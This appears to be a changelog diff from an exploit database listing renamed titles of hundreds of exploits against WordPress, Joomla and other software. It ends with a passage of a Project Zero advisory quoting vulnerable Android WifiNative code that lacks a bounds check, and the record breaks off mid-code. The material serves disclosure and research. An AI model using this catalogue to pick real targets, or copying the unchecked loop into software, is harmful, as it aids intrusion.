DB: 2016-12-21

2 new exploits

FlashGet 1.9 - (FTP PWD Response) Remote Buffer Overflow (PoC)
FlashGet 1.9 - 'FTP PWD Response' Remote Buffer Overflow (PoC)

VMware Workstation - 'hcmon.sys 6.0.0.45731' Local Denial of Service
VMware Workstation 6.5.1 - 'hcmon.sys 6.0.0.45731' Local Denial of Service

Flashget 3.x - IEHelper Remote Exec (PoC)
FlashGet 3.x - IEHelper Remote Exec (PoC)

Rosoft media player 4.4.4 - Buffer Overflow (SEH) (PoC)
Rosoft Media Player 4.4.4 - Buffer Overflow (SEH) (PoC)
Google Android -  WifiNative::setHotlist Stack Overflow
Microsoft Internet Explorer 11 MSHTML - CSplice­Tree­Engine::Remove­Splice Use-After-Free (MS14-035)
FlashGet 1.9.0.1012 - (FTP PWD Response) SEH STACK Overflow
FlashGet 1.9.0.1012 - (FTP PWD Response) Buffer Overflow (SafeSEH)
FlashGet 1.9.0.1012 - 'FTP PWD Response' SEH STACK Overflow
FlashGet 1.9.0.1012 - 'FTP PWD Response' Buffer Overflow (SafeSEH)

freeFTPd - Remote Authentication Bypass
freeFTPd 1.2.6 - Remote Authentication Bypass

freeFTPd 1.0.10 - 'PASS' SEH Overflow (Metasploit)
freeFTPd 1.0.10 - 'PASS' SEH Buffer Overflow (Metasploit)

freeFTPd - 'PASS' Buffer Overflow (Metasploit)
freeFTPd 1.0.10 - 'PASS' Buffer Overflow (Metasploit)
AlberT-EasySite 1.0a5 - (PSA_PATH) Remote File Inclusion
iziContents RC6 - GLOBALS[] Remote Code Execution
AlberT-EasySite 1.0a5 - 'PSA_PATH' Parameter Remote File Inclusion
iziContents RC6 - Remote Code Execution

SunShop Shopping Cart 3.5 - 'abs_path' Remote File Inclusion
SunShop Shopping Cart 3.5 - 'abs_path' Parameter Remote File Inclusion

SunShop 4.0 RC 6 - 'Search' Blind SQL Injection
SunShop Shopping Cart 4.0 RC 6 - 'Search' Blind SQL Injection

izicontents rc6 - (Remote File Inclusion / Local File Inclusion) Multiple Vulnerabilities
iziContents rc6 - Remote File Inclusion / Local File Inclusion
gelato CMS 0.95 - (img) Remote File Disclosure
dotCMS 1.6 - 'id' Multiple Local File Inclusion
ZeeJobsite 2.0 - (adid) SQL Injection
gelato CMS 0.95 - 'img' Parameter Remote File Disclosure
dotCMS 1.6 - 'id' Parameter Local File Inclusion
Zeeways ZeeJobsite 2.0 - 'adid' Parameter SQL Injection

XNova 0.8 sp1 - (xnova_root_path) Remote File Inclusion
XNova 0.8 sp1 - 'xnova_root_path' Parameter Remote File Inclusion

PHPBasket - 'product.php pro_id' SQL Injection
PHPBasket - 'pro_id' Parameter SQL Injection
Ad Board - 'id' SQL Injection
SunShop 4.1.4 - 'id' SQL Injection
Banner Management Script - 'tr.php id' SQL Injection
Ad Board - 'id' Parameter SQL Injection
SunShop Shopping Cart 4.1.4 - 'id' Parameter SQL Injection
Banner Management Script - 'id' Parameter SQL Injection
phpBazar 2.0.2 - (adid) SQL Injection
webEdition CMS - (we_objectID) Blind SQL Injection
CustomCMS 4.0 - (CCMS) print.php SQL Injection
phpBazar 2.0.2 - 'adid' Parameter SQL Injection
webEdition CMS - 'we_objectID' Parameter Blind SQL Injection
CustomCMS 4.0 - 'print.php' SQL Injection

TinyCMS 1.1.2 - (templater.php) Local File Inclusion
TinyCMS 1.1.2 - 'templater.php' Local File Inclusion
onenews Beta 2 - (Cross-Site Scripting / HTML Injection / SQL Injection) Multiple Vulnerabilities
5 star review - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
onenews Beta 2 - Cross-Site Scripting / HTML Injection / SQL Injection
5 star review - Cross-Site Scripting / SQL Injection

Web Directory Script 2.0 - (name) SQL Injection
Web Directory Script 2.0 - 'name' Parameter SQL Injection

Crafty Syntax Live Help 2.14.6 - (department) SQL Injection
Crafty Syntax Live Help 2.14.6 - 'department' Parameter SQL Injection
k-rate - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
CMME 1.12 - (Local File Inclusion / Cross-Site Scripting / Cross-Site Request Forgery/Download Backup/Make Directory) Multiple Vulnerabilities
Thickbox Gallery 2.0 - (Admins.php) Admin Data Disclosure
k-rate - SQL Injection / Cross-Site Scripting
CMME 1.12 - Local File Inclusion / Cross-Site Scripting / Cross-Site Request Forgery/Download Backup/Make Directory
Thickbox Gallery 2.0 - 'Admins.php' Admin Data Disclosure

phpMyRealty 1.0.9 - Multiple SQL Injections
PHPMyRealty 1.0.9 - Multiple SQL Injections
brim 2.0.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
Web Directory Script 1.5.3 - (site) SQL Injection
Words tag script 1.2 - (word) SQL Injection
Brim 2.0.0 - SQL Injection / Cross-Site Scripting
Web Directory Script 1.5.3 - 'site' Parameter SQL Injection
Words tag script 1.2 - 'word' Parameter SQL Injection

WeBid 0.5.4 - (item.php id) SQL Injection
WeBid 0.5.4 - 'item.php' SQL Injection

ZeeJobsite 2.0 - Arbitrary File Upload
Zeeways ZeeJobsite 2.0 - Arbitrary File Upload

BandSite CMS 1.1.4 - (members.php memid) SQL Injection
BandSite CMS 1.1.4 - 'members.php' SQL Injection

Thickbox Gallery 2 - 'index.php ln' Local File Inclusion
Thickbox Gallery 2 - 'index.php' Local File Inclusion

Joomla! Component 'com_wmtpic' 1.0 - SQL Injection
Joomla! Component com_wmtpic 1.0 - SQL Injection
Joomla! Component 'com_redshop' 1.0 - Local File Inclusion
Joomla! Component 'com_redtwitter' 1.0 - Local File Inclusion
Joomla! Component redSHOP 1.0 - Local File Inclusion
Joomla! Component redTWITTER 1.0 - Local File Inclusion
Joomla! Component 'com_svmap' 1.1.1 - Local File Inclusion
Joomla! Component 'com_shoutbox' - Local File Inclusion
Joomla! Component SVMap 1.1.1 - Local File Inclusion
Joomla! Component Shoutbox Pro - Local File Inclusion

Joomla! Component 'com_sebercart' 1.0.0.12 - Local File Inclusion
Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion

Joomla! Component 'com_xobbix' 1.0 - 'prodid' Parameter SQL Injection
Joomla! Component XOBBIX 1.0 - 'prodid' Parameter SQL Injection

Joomla! Component 'com_vjdeo' 1.0 - Local File Inclusion
Joomla! Component VJDEO 1.0 - Local File Inclusion

Joomla! Component 'com_realtyna' 1.0.15 - Local File Inclusion
Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion

Joomla! Component 'com_powermail' 1.5.3 - Local File Inclusion
Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion

Joomla! Component 'com_properties' - 'aid' Parameter SQL Injection
Joomla! Component Real Estate Property 3.1.22-03 - 'aid' Parameter SQL Injection

Joomla! Component 'com_tweetla' - Local File Inclusion
Joomla! Component TweetLA 1.0.1 - Local File Inclusion
Joomla! Component 'com_preventive' - Local File Inclusion
Joomla! Component 'com_rokmodule' - 'moduleid' Parameter Blind SQL Injection
Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion
Joomla! Component RokModule 1.1 - 'moduleid' Parameter Blind SQL Injection

Joomla! Component 'com_travelbook' 1.0.1 - Local File Inclusion
Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion

Joomla! Component 'com_webtv' - Local File Inclusion
Joomla! Component Web TV 1.0 - Local File Inclusion

Joomla! Component 'com_onlineexam' - Local File Inclusion
Joomla! Component Online Exam 1.5.0 - Local File Inclusion

Joomla! Component 'com_sweetykeeper' - Local File Inclusion
Joomla! Component Sweetykeeper 1.5 - Local File Inclusion

Joomla! Component 'com_sermonspeaker' - SQL Injection
Joomla! Component SermonSpeaker - SQL Injection

Joomla! Component 'com_QPersonel' - SQL Injection
Joomla! Component QPersonel 1.0.2 - SQL Injection

Joomla! Component 'com_photobattle' - Local File Inclusion
Joomla! Component Photo Battle 1.0.1 - Local File Inclusion
Joomla! Component 'com_zimbcomment' - Local File Inclusion
Joomla! Component 'com_zimbcore' - Local File Inclusion
Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion
Joomla! Component ZiMBCore 0.1 - Local File Inclusion
Joomla! Component 'com_wmi' - Local File Inclusion
Joomla! Component 'com_orgchart' - Local File Inclusion
Joomla! Component WMI 1.5.0 - Local File Inclusion
Joomla! Component OrgChart 1.0.0 - Local File Inclusion

Joomla! Component 'com_ultimateportfolio' - Local File Inclusion
Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion

Joomla! Component 'com_smartsite' - Local File Inclusion
Joomla! Component SmartSite 1.0.0 - Local File Inclusion

Joomla! Component 'com_simpledownload' 0.9.5 - Local File Inclusion
Joomla! Component simpledownload 0.9.5 - Local File Inclusion

Joomla! Component 'com_simpledownload' 0.9.5 - Local File Disclosure
Joomla! Component simpledownload 0.9.5 - Local File Disclosure

Wordpress Plugin TinyBrowser - Arbitrary File Upload
WordPress Plugin TinyBrowser - Arbitrary File Upload

Joomla! Component 'com_qpersonel' 1.0 - SQL Injection
Joomla! Component Q-Personel 1.0 - SQL Injection

Joomla! Component 'com_searchlog' - SQL Injection
Joomla! Component Search Log 3.1.0 - SQL Injection

Joomla! Component 'com_oziogallery' 2 - Multiple Vulnerabilities
Joomla! Component Ozio Gallery 2 - Multiple Vulnerabilities

Joomla! Component 'com_picasa2gallery' - Local File Inclusion
Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion

Joomla! Component 'jeeventcalendar' - SQL Injection
Joomla! Component JE Ajax Event Calendar 1.0.5 - SQL Injection

Joomla! Component 'com_realtyna' - Local File Inclusion
Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion
Joomla! Component 'jesubmit' - SQL Injection
Joomla! Component 'com_sef' - Remote File Inclusion
Joomla! Component jesubmit 1.4 - SQL Injection
Joomla! Component com_sef - Remote File Inclusion

Joomla! Component 'jesectionfinder' - Local File Inclusion
Joomla! Component jesectionfinder - Local File Inclusion

Joomla! Component 'Joomanager' - SQL Injection
Joomla! Component Joomanager - SQL Injection

Joomla! Component 'com_socialads' - Persistent Cross-Site Scripting
Joomla! Component Techjoomla SocialAds - Persistent Cross-Site Scripting
Joomla! Component 'com_redshop' 1.0 - 'pid' Parameter SQL Injection
Joomla! Component 'com_quickfaq' - Blind SQL Injection
Joomla! Component redSHOP 1.0 - 'pid' Parameter SQL Injection
Joomla! Component QuickFAQ 1.0.3 - Blind SQL Injection

Joomla! Component 'com_redshop' 1.0.23.1 - Blind SQL Injection
Joomla! Component redSHOP 1.0.23.1 - Blind SQL Injection

Joomla! Component 'com_staticxt' - SQL Injection
Joomla! Component StaticXT - SQL Injection

Joomla! Component 'com_oziogallery' - SQL Injection
Joomla! Component Ozio Gallery - SQL Injection

Joomla! Component 'com_youtube' - SQL Injection
Joomla! Component YouTube 1.5 - SQL Injection

Joomla! Component 'com_ttvideo' 1.0 - SQL Injection
Joomla! Component TTVideo 1.0 - SQL Injection

Joomla! Component 'com_teams' - Multiple Blind SQL Injection
Joomla! Component Teams - Multiple Blind SQL Injection

Joomla! Component 'com_picsell' - Local File Disclosure
Joomla! Component PicSell 1.0 - Local File Disclosure

Joomla! Component 'com_restaurantguide' - Multiple Vulnerabilities
Joomla! Component Restaurant Guide 1.0.0 - Multiple Vulnerabilities

Joomla! Component 'com_timetrack' 1.2.4 - Multiple SQL Injection
Joomla! Component TimeTrack 1.2.4 - Multiple SQL Injection

Joomla! Component 'com_sponsorwall' - SQL Injection
Joomla! Component Sponsor Wall 1.1 - SQL Injection

Joomla! Component 'com_pro_desk' 1.5 - Local File Inclusion
Joomla! Component ProDesk 1.5 - Local File Inclusion

Joomla! Component 'mdigg' - SQL Injection
Joomla! Component mDigg 2.2.8 - SQL Injection

phpMyRealty 1.0.7 - SQL Injection
PHPMyRealty 1.0.7 - SQL Injection

Joomla! Component 'com_timereturns' 2.0 - SQL Injection
Joomla! Component Time Returns 2.0 - SQL Injection

Joomla! Component 'com_techfolio' 1.0 - SQL Injection
Joomla! Component Techfolio 1.0 - SQL Injection

Joomla! Component 'com_vikrealestate' 1.0 - Multiple Vulnerabilities
Joomla! Component Vik Real Estate 1.0 - Multiple Vulnerabilities

BRIM < 2.0.0 - SQL Injection
Brim < 2.0.0 - SQL Injection

Joomla! Component 'com_rokmodule' - 'module' Parameter Blind SQL Injection
Joomla! Component RokModule 1.1 - 'module' Parameter Blind SQL Injection

Wordpress Plugin White Label CMS 1.5 - Cross-Site Request Forgery / Persistent Cross-Site Scripting
WordPress Plugin White Label CMS 1.5 - Cross-Site Request Forgery / Persistent Cross-Site Scripting

webid 1.0.5 - Directory Traversal
weBid 1.0.5 - Directory Traversal

Wordpress Theme Clockstone (and other CMSMasters Themes) - Arbitrary File Upload
WordPress Theme Clockstone (and other CMSMasters Themes) - Arbitrary File Upload

Webid 1.0.6 - Multiple Vulnerabilities
WeBid 1.0.6 - Multiple Vulnerabilities
MyBulletinBoard RC4 - 'Username' Parameter SQL Injection
MyBulletinBoard RC4 - 'member.php' Multiple Parameter SQL Injection
MyBulletinBoard RC4 - 'polloptions' Parameter SQL Injection
MyBulletinBoard RC4 - 'action' Parameter SQL Injection
MyBulletinBoard (MyBB) RC4 - 'Username' Parameter SQL Injection
MyBulletinBoard (MyBB) RC4 - 'member.php' Multiple Parameter SQL Injection
MyBulletinBoard (MyBB) RC4 - 'polloptions' Parameter SQL Injection
MyBulletinBoard (MyBB) RC4 - 'action' Parameter SQL Injection

MyBulletinBoard 1.0 - Multiple SQL Injections
MyBulletinBoard (MyBB) 1.0 - Multiple SQL Injections

MyBulletinBoard 1.0 - 'RateThread.php' SQL Injection
MyBulletinBoard (MyBB) 1.0 - 'RateThread.php' SQL Injection

MyBulletinBoard 1.0 - 'usercp.php' SQL Injection
MyBulletinBoard (MyBB) 1.0 - 'usercp.php' SQL Injection

Joomla! Component 'com_redshop' 1.2 - SQL Injection
Joomla! Component redSHOP 1.2 - SQL Injection

MyBulletinBoard 1.0.x/1.1.x - 'usercp.php' SQL Injection
MyBulletinBoard (MyBB) 1.0.x/1.1.x - 'usercp.php' SQL Injection

MyBulletinBoard 1.x - 'usercp.php' Directory Traversal
MyBulletinBoard (MyBB) 1.x - 'usercp.php' Directory Traversal
Grayscale BandSite CMS 1.1 - help_news.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - help_merch.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - help_mp3.php max_file_size_purdy Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - sendemail.php message_text Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - header.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - login_header.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - bio_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - gbook_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - interview_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - links_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - lyrics_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - member_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - merch_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - mp3_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - news_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - pastshows_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - photo_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - releases_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - reviews_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - shows_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - signgbook_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - footer.php this_year Parameter Cross-Site Scripting
BandSite CMS 1.1 - 'help_news.php' Cross-Site Scripting
BandSite CMS 1.1 - 'help_merch.php' Cross-Site Scripting
BandSite CMS 1.1 - 'help_mp3.php' Cross-Site Scripting
BandSite CMS 1.1 - 'sendemail.php' Cross-Site Scripting
BandSite CMS 1.1 - 'header.php' Cross-Site Scripting
BandSite CMS 1.1 - 'login_header.php' Cross-Site Scripting
BandSite CMS 1.1 - 'bio_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'gbook_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'interview_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'links_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'lyrics_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'member_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'merch_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'mp3_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'news_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'pastshows_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'photo_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'releases_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'reviews_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'shows_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'signgbook_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'footer.php' Cross-Site Scripting

Wordpress Plugin Quick Paypal Payments 3.0 - Presistant Cross-Site Scripting
WordPress Plugin Quick Paypal Payments 3.0 - Presistant Cross-Site Scripting

Active PHP BookMarks 1.1.2 - APB_SETTINGS['apb_path' ] Multiple Remote File Inclusion
Active PHP BookMarks 1.1.2 - Multiple Remote File Inclusion

Wordpress Theme Redoable 1.2 - header.php s Parameter Cross-Site Scripting
WordPress Theme Redoable 1.2 - header.php s Parameter Cross-Site Scripting

TurnkeyWebTools Sunshop 3.5/4.0 - Multiple Remote File Inclusion
SunShop Shopping Cart 3.5/4.0 - Multiple Remote File Inclusion

Active PHP BookMarks 1.0 - APB.php Remote File Inclusion
Active PHP BookMarks 1.0 - 'APB.php' Remote File Inclusion
TurnkeyWebTools SunShop Shopping Cart 4.0 - 'index.php' Multiple Parameter SQL Injection
TurnkeyWebTools SunShop Shopping Cart 4.0 - 'index.php' l Parameter Cross-Site Scripting
SunShop Shopping Cart 4.0 - 'index.php' Multiple Parameter SQL Injection
SunShop Shopping Cart 4.0 - 'index.php' l Parameter Cross-Site Scripting

Wordpress Plugin Google FeedBurner FeedSmith 2.2 - Cross-Site Request Forgery
WordPress Plugin Google FeedBurner FeedSmith 2.2 - Cross-Site Request Forgery

DMCMS 0.7 - 'index.php' SQL Injection
deeemm CMS (dmcms) 0.7 - 'index.php' SQL Injection
EasySite 2.0 - browser.php EASYSITE_BASE Parameter Remote File Inclusion
EasySite 2.0 - image_editor.php EASYSITE_BASE Parameter Remote File Inclusion
EasySite 2.0 - skin_chooser.php EASYSITE_BASE Parameter Remote File Inclusion
EasySite 2.0 - 'browser.php' Remote File Inclusion
EasySite 2.0 - 'image_editor.php' Remote File Inclusion
EasySite 2.0 - 'skin_chooser.php' Remote File Inclusion

MatterDaddy Market 1.1 - 'admin/login.php' Cross-Site Scripting
MatterDaddy Market 1.1 - 'login.php' Cross-Site Scripting

Wordpress Plugin TYPO3 - 't3m_cumulus_tagcloud' Extension 1.0 - HTML Injection / Cross-Site Scripting
WordPress Plugin TYPO3 - 't3m_cumulus_tagcloud' Extension 1.0 - HTML Injection / Cross-Site Scripting
Joomla! Component 'com_perchaimageattach' 1.1 - 'Controller' Parameter Traversal Arbitrary File Access
Joomla! Component 'com_perchafieldsattach' 1.0 - 'index.php' Controller Parameter Traversal Arbitrary File Access
Joomla! Component 'com_perchadownloadsattach' 1.1 - 'Controller' Parameter Traversal Arbitrary File Access
Joomla! Component 'com_perchagallery' 1.6 Beta - 'Controller' Parameter Traversal Arbitrary File Access
Joomla! Component Percha Image Attach 1.1 - 'Controller' Parameter Traversal Arbitrary File Access
Joomla! Component Percha Fields Attach 1.0 - 'Controller' Parameter Traversal Arbitrary File Access
Joomla! Component Percha Downloads Attach 1.1 - 'Controller' Parameter Traversal Arbitrary File Access
Joomla! Component Percha Gallery 1.6 Beta - 'Controller' Parameter Traversal Arbitrary File Access

Joomla! Component 'com_perchacategoriestree' 0.6 - 'Controller' Parameter Arbitrary File Access
Joomla! Component Percha Multicategory Article 0.6 - 'Controller' Parameter Arbitrary File Access

Joomla! Component 'com_youtubegallery' - SQL Injection
Joomla! Component Youtube Gallery 4.1.7 - SQL Injection

Wordpress Plugin Firestats 1.6.5 - Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin Firestats 1.6.5 - Multiple Cross-Site Scripting Vulnerabilities

Joomla! Component 'FreiChat' 1.0/2.x - Unspecified HTML Injection
Joomla! Component FreiChat 1.0/2.x - Unspecified HTML Injection

Wordpress Plugin WooCommerce Store Exporter 1.7.5 - Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin WooCommerce Store Exporter 1.7.5 - Multiple Cross-Site Scripting Vulnerabilities

Joomla! Component 'com_weblinks' - 'Itemid' Parameter SQL Injection
Joomla! Component Weblinks - 'Itemid' Parameter SQL Injection

Wordpress Plugin Creative Contact Form 0.9.7 - Arbitrary File Upload
WordPress Plugin Creative Contact Form 0.9.7 - Arbitrary File Upload

Wordpress Plugin Powerhouse Museum Collection Image Grid 0.9.1.1 - 'tbpv_username' Parameter Cross-Site Scripting
WordPress Plugin Powerhouse Museum Collection Image Grid 0.9.1.1 - 'tbpv_username' Parameter Cross-Site Scripting

Wordpress Plugin Paid Memberships Pro 1.7.14.2 - Directory Traversal
WordPress Plugin Paid Memberships Pro 1.7.14.2 - Directory Traversal

Wordpress Plugin DukaPress 2.5.2 - Directory Traversal
WordPress Plugin DukaPress 2.5.2 - Directory Traversal

Wordpress Plugin Google Document Embedder 2.5.16 - mysql_real_escpae_string Bypass SQL Injection
WordPress Plugin Google Document Embedder 2.5.16 - mysql_real_escpae_string Bypass SQL Injection

Wordpress Plugin WonderPlugin Audio Player 2.0 - Blind SQL Injection / Cross-Site Scripting
WordPress Plugin WonderPlugin Audio Player 2.0 - Blind SQL Injection / Cross-Site Scripting

Wordpress Plugin Duplicator 0.5.8 - Privilege Escalation
WordPress Plugin Duplicator 0.5.8 - Privilege Escalation

Wordpress Plugin Single Personal Message 1.0.3 - SQL Injection
WordPress Plugin Single Personal Message 1.0.3 - SQL Injection

Joomla! Component 'com_sanpham' - Multiple SQL Injections
Joomla! Component Vik Real Estate 1.0 - Multiple SQL Injections

Wordpress Plugin VideoWhisper Video Conference Integration 4.91.8 - Arbitrary File Upload
WordPress Plugin VideoWhisper Video Conference Integration 4.91.8 - Arbitrary File Upload

Joomla! Component 'mod_currencyconverter' - 'from' Parameter Cross-Site Scripting
Joomla! Component Currency Converter 1.0.0 - 'from' Parameter Cross-Site Scripting

Wordpress Plugin Shareaholic 7.6.0.3 - Cross-Site Scripting
WordPress Plugin Shareaholic 7.6.0.3 - Cross-Site Scripting

Wordpress Plugin Paypal Currency Converter Basic For WooCommerce - File Read
WordPress Plugin Paypal Currency Converter Basic For WooCommerce - File Read

Joomla! Component 'mod_ccnewsletter' 1.0.7 - 'id' Parameter SQL Injection
Joomla! Component CCNewsLetter 1.0.7 - 'id' Parameter SQL Injection

Wordpress Plugin Simple Photo Gallery 1.7.8 - Blind SQL Injection
WordPress Plugin Simple Photo Gallery 1.7.8 - Blind SQL Injection

Wordpress Plugin PDF & Print Button Joliprint 1.3.0 - Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin PDF & Print Button Joliprint 1.3.0 - Multiple Cross-Site Scripting Vulnerabilities
Wordpress Plugin 2 Click Social Media Buttons 0.32.2 - Multiple Cross-Site Scripting Vulnerabilities
Wordpress Plugin iFrame Admin Pages 0.1 - 'main_page.php' Cross-Site Scripting
WordPress Plugin 2 Click Social Media Buttons 0.32.2 - Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin iFrame Admin Pages 0.1 - 'main_page.php' Cross-Site Scripting
Wordpress Plugin Media Library Categories - Multiple Cross-Site Scripting Vulnerabilities
Wordpress Plugin LeagueManager 3.7 - Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin Media Library Categories - Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin LeagueManager 3.7 - Multiple Cross-Site Scripting Vulnerabilities
Wordpress Plugin GD Star Rating 1.9.16 - 'tpl_section' Parameter Cross-Site Scripting
Wordpress Plugin ]Mingle Forum 1.0.33 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin GD Star Rating 1.9.16 - 'tpl_section' Parameter Cross-Site Scripting
WordPress Plugin ]Mingle Forum 1.0.33 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities

Wordpress Plugin Share and Follow 1.80.3 - 'admin.php' Cross-Site Scripting
WordPress Plugin Share and Follow 1.80.3 - 'admin.php' Cross-Site Scripting

Wordpress Plugin EZ SQL Reports < 4.11.37 - Multiple Vulnerabilities
WordPress Plugin EZ SQL Reports < 4.11.37 - Multiple Vulnerabilities
Joomla! Component 'com_rpl' 8.9.2 - Multiple SQL Injections
Joomla! Component 'com_rpl' 8.9.2 - Persistent Cross-Site Scripting / Cross-Site Request Forgery
Joomla! Component Realtyna RPL 8.9.2 - Multiple SQL Injections
Joomla! Component Realtyna RPL 8.9.2 - Persistent Cross-Site Scripting / Cross-Site Request Forgery

Wordpress Plugin Xorbin Analog Flash Clock - 'widgetUrl' Parameter Cross-Site Scripting
WordPress Plugin Xorbin Analog Flash Clock - 'widgetUrl' Parameter Cross-Site Scripting

Wordpress Plugin miniBB - SQL Injection / Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin miniBB - SQL Injection / Multiple Cross-Site Scripting Vulnerabilities

Joomla! Component 'com_sexypolling' - 'answer_id' Parameter SQL Injection
Joomla! Component Sexy polling 1.0.8 - 'answer_id' Parameter SQL Injection

Joomla! Component 'com_novasfh' - 'upload.php' Arbitrary File Upload
Joomla! Component Projoom NovaSFH 3.0.2 - 'upload.php' Arbitrary File Upload

Wordpress Plugin Simple Ads Manager 2.9.4.116 - SQL Injection
WordPress Plugin Simple Ads Manager 2.9.4.116 - SQL Injection

Wordpress Plugin Acunetix WP Security Plugin 3.0.3 - Cross-Site Scripting
WordPress Plugin Acunetix WP Security Plugin 3.0.3 - Cross-Site Scripting

Wordpress Plugin Job Script by Scubez - Remote Code Execution
WordPress Plugin Job Script by Scubez - Remote Code Execution

Wordpress Plugin Premium SEO Pack 1.9.1.3 - wp_options Overwrite
WordPress Plugin Premium SEO Pack 1.9.1.3 - wp_options Overwrite
Wordpress Plugin Answer My Question 1.3 - SQL Injection
Wordpress Plugin Sirv 1.3.1 - SQL Injection
Wordpress Plugin BBS e-Franchise 1.1.1 - SQL Injection
Wordpress Plugin Product Catalog 8 1.2.0 - SQL Injection
WordPress Plugin Answer My Question 1.3 - SQL Injection
WordPress Plugin Sirv 1.3.1 - SQL Injection
WordPress Plugin BBS e-Franchise 1.1.1 - SQL Injection
WordPress Plugin Product Catalog 8 1.2.0 - SQL Injection

Wordpress Plugin Olimometer 2.56 - SQL Injection
WordPress Plugin Olimometer 2.56 - SQL Injection

Wordpress Plugin WP Vault 0.8.6.6 - Local File Inclusion
WordPress Plugin WP Vault 0.8.6.6 - Local File Inclusion
Wordpress Plugin WP Support Plus Responsive Ticket System 7.1.3 - SQL Injection
Wordpress Plugin WP Private Messages 1.0.1 - SQL Injection
WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - SQL Injection
WordPress Plugin WP Private Messages 1.0.1 - SQL Injection

platforms/android/dos/40945.txt

@@ -0,0 +1,138 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=958
+
+The following code in frameworks/opt/net/wifi/service/jni/com_android_server_wifi_WifiNative.cpp doesn't validate the parameter params.num_bssid, and then copies that number of elements into a stack-allocated wifi_bssid_hotlist_params structure. I don't think this can be reached from an untrusted_app context; but it can be reached from a context with system_api_service access; so a compromised platform app or one of several lower privileged system services (bluetooth, nfc etc.).
+
+static jboolean android_net_wifi_setHotlist(
+        JNIEnv *env, jclass cls, jint iface, jint id, jobject ap)  {
+
+    JNIHelper helper(env);
+    wifi_interface_handle handle = getIfaceHandle(helper, cls, iface);
+    ALOGD("setting hotlist on interface[%d] = %p", iface, handle);
+
+    wifi_bssid_hotlist_params params;
+    memset(&params, 0, sizeof(params));
+
+    params.lost_ap_sample_size = helper.getIntField(ap, "apLostThreshold");
+
+    JNIObject<jobjectArray> array = helper.getArrayField(
+            ap, "bssidInfos", "[Landroid/net/wifi/WifiScanner$BssidInfo;");
+    params.num_bssid = helper.getArrayLength(array);
+
+    if (params.num_bssid == 0) {
+        ALOGE("setHotlist array length was 0");
+        return false;
+    }
+
+    for (int i = 0; i < params.num_bssid; i++) { // <--- no validation on num_bssid
+        JNIObject<jobject> objAp = helper.getObjectArrayElement(array, i);
+
+        JNIObject<jstring> macAddrString = helper.getStringField(objAp, "bssid");
+        if (macAddrString == NULL) {
+            ALOGE("Error getting bssid field");
+            return false;
+        }
+
+        ScopedUtfChars chars(env, macAddrString);
+        const char *bssid = chars.c_str();
+        if (bssid == NULL) {
+            ALOGE("Error getting bssid");
+            return false;
+        }
+        parseMacAddress(bssid, params.ap[i].bssid); // <--- params.ap has 128 elements.
+
+        mac_addr addr;
+        memcpy(addr, params.ap[i].bssid, sizeof(mac_addr));
+
+        char bssidOut[32];
+        snprintf(bssidOut, sizeof(bssidOut), "%0x:%0x:%0x:%0x:%0x:%0x", addr[0],
+                 addr[1], addr[2], addr[3], addr[4], addr[5]);
+
+        ALOGD("Added bssid %s", bssidOut);
+
